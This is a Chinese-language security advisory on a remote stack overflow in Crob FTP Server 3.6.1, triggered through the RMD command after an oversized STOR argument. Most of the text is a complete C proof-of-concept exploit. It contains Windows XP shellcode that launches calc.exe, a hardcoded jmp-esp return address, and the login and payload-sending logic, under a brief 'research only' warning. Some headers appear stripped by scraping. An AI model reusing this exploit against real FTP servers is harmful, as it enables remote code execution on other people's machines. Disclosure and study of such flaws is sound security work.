
Crob FTP Server远程RMD命令栈溢出漏洞

受影响系统: Crob Crob FTP Server 3.6.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: _blank>13847 Crob Ftp Server是一款简单易用的FTP服务程序。 Crob FTP Server在处理客户端请求时存在缓冲区溢出漏洞。 如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功利用这个漏洞的攻击者可在服务器上以执行代码。 <*来源:Leon Juranic (ljuranic@LSS.hr) 链接:_blank>http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-06 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! /* * CrobFTP remote stack overflow PoC * --------------------------------- * Tested on Crob FTP Server 3.6.1, Windows XP * * Coded by Leon Juranic * LSS Security / _blank>http://security.lss.hr * */ #include #include #include #pragma comment (lib,"ws2_32") char *fzz_recv (int sock) { fd_set fds; struct timeval tv; static char buf[10000]; char *ptr=buf; int n; tv.tv_sec = 5; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock,&fds); if (select(NULL,&fds,NULL,NULL,&tv) != 0) { if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0); buf[n-1] = ';\0';; printf ("RECV: %s\n",buf); return buf; } else { return NULL; } } int login (int sock, char *user, char *pass) { char buf[1024], *bla; bla=fzz_recv(sock); printf ("recv: %s\n",bla); sprintf (buf,"USER %s\r\n",user); send (sock,buf,strlen(buf),0); bla=fzz_recv(sock); printf ("recv: %s\n",bla); sprintf (buf,"PASS %s\r\n",pass); send (sock,buf,strlen(buf),0); bla=fzz_recv(sock); printf ("recv: %s\n",bla); if (strcmp("230",bla) != NULL) return 0; else return -1; return 0; } void lame_sploit (char *pack, char *user, char *pass) { WORD wVersionRequested; WSADATA wsaData; int sock, err,x; struct sockaddr_in sin; char buf[2000],tmp[1000]; char *shell= // 5 min. 
XP SP1 shellcode "\x33\xc0" // xor eax,eax "\x50" // push eax (\0) "\x68\x2e\x65\x78\x65" // push ';.exe'; "\x68\x63\x61\x6c\x63" // push ';calc'; "\x54" // push esp "\xba\x44\x80\xc2\x77" // mov edx, 77c28044 "\xff\xd2"; // call edx (system) wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf ("ERROR: Sorry, cannot create socket!!!\n"); ExitProcess(-1); } sock=socket(AF_INET,SOCK_STREAM,0); sin.sin_family=AF_INET; sin.sin_addr.s_addr = inet_addr(pack); sin.sin_port = htons(21); if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf ("CONNECT :(((\n"); ExitProcess(-1); } if (login(sock,user,pass) == -1) { printf ("ERROR: Cannot login to FTP server, sorry!!!\n"); exit(-1); } memset(tmp,0,sizeof(tmp)); memset (tmp,0x90,180); memcpy (&tmp[80],shell,strlen(shell)); *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into ';jmp esp'; *(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74 *(long*)&tmp[170] = 0x9090e4ff; // jmp esp _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp); printf ("DEBUG: %.30s %d\n",buf,strlen(buf)); send (sock,buf,strlen(buf),0); printf ("%s\n",fzz_recv(sock)); strcpy(buf,"RMD "); for (x=0;x<276;x++) strcat (buf,".../"); strcat(buf,"\r\n"); printf ("Sending exploit strings\n"); send (sock,buf,strlen(buf),0); printf ("recv: %s\n",fzz_recv(sock)); } main (int argc, char **argv) { printf ("CrobFTP Stack overflow PoC \n" "Coded by Leon Juranic \n" "LSS Security / _blank>http://security.lss.hr/\n"); if (argc < 4 ) { printf ("\nusage: %s \n",argv[0]); exit(-1); } lame_sploit(argv[1],argv[2],argv[3]); } 建议: -------------------------------------------------------------------------------- 厂商补丁: Crob ---- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: _blank>http://www.crob.net/studio/ftpserver/
